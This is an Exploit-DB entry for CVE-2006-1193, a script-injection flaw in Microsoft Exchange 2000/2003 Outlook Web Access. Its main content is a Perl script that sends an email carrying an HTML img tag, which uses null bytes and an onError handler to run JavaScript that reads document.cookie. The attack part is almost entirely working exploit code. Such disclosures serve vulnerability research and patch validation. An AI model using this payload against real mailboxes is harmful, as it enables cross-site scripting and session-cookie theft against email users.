Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection

EDB-ID:

28005

CVE:

2006-1193

EDB Verified:

Author:

Daniel Fabian

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2006-06-13

Vulnerable App: 
source: https://www.securityfocus.com/bid/18381/info

Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability.

A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user.

#!/usr/bin/perl

 

use Net::SMTP;

 

my $to = "recipient\@domain.tld";

my $sub = "Watch out - Cross Site Scripting Attack";

my $from = "originator\@domain2.tld";

my $smtp = "mail.example.tld";

 

my $cont = "<img alt='hugo\0abc' src='http://www.example.com/

imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)'

alt='<s'\0";

 

$smtp = Net::SMTP->new($smtp);

$smtp->mail("$from") || die("error 1");

$smtp->to("$to") || die("error 2");

 

$smtp->data() ;

$smtp->datasend("To: $to\n") ;

$smtp->datasend("From: $from\n") ;

$smtp->datasend("Subject: $sub\n");

$smtp->datasend("Content-Type: text/html\n\n");

 

$smtp->datasend("$cont") ;

$smtp->datasend("\n\n") ;

$smtp->dataend() ;

$smtp->quit() ;

 

print "$cont\n\ndone\n";
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services